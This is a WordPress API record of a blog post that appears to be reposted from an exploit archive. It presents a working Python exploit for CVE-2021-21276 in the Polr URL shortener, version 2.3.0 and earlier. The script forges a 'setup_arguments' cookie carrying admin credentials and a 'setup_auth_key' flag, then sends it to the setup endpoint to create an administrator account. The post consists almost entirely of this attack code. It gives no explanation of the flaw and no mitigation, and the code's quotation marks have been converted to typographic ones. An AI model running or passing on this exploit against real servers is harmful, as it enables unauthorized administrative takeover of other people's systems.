{"id":40026,"date":"2023-04-06T22:09:02","date_gmt":"2023-04-06T18:09:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171743\/polrurl230-takeover.txt"},"modified":"2023-04-08T10:35:55","modified_gmt":"2023-04-08T06:05:55","slug":"polr-url-2-3-0-shortener-admin-takeover","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/polr-url-2-3-0-shortener-admin-takeover\/","title":{"rendered":"POLR URL 2.3.0 Shortener Admin Takeover"},"content":{"rendered":"
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover\r\n# Date: 2021-02-01\r\n# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>\r\n# Vendor Homepage: -\r\n# Software Link: https:\/\/github.com\/cydrobolt\/polr\r\n# Version: < 2.3.0\r\n# Tested on: Linux\r\n# CVE : CVE-2021-21276<\/code><\/pre>\n
import json<\/p>\n
<\/code><\/pre>\n
import requests<\/p>\n
<\/code><\/pre>\n
payload = {
\n‘acct_username’: ‘admin’,
\n‘acct_password’: ‘password’,
\n‘acct_email’: ’email@youremail.com’,
\n‘setup_auth_key’: True,
\n}<\/p>\n
<\/code><\/pre>\n
r = requests.get(‘http:\/\/localhost\/setup\/finish’,
\ncookies={‘setup_arguments’: json.dumps(payload)})
\nprint(r.text)<\/p>\n
<\/code><\/pre>\n
 <\/p>\n
<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: POLR URL 2.3.0 – Shortener Admin Takeover # Date: 2021-02-01 # Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev> # Vendor Homepage: – # Software Link: https:\/\/github.com\/cydrobolt\/polr # Version: < 2.3.0 # Tested on: Linux # CVE : CVE-2021-21276 import json import requests payload = { ‘acct_username’: ‘admin’, ‘acct_password’: ‘password’, ‘acct_email’: ’email@youremail.com’, ‘setup_auth_key’: True, } r …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40026","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40026"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026\/revisions"}],"predecessor-version":[{"id":40059,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026\/revisions\/40059"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40026"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40026"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}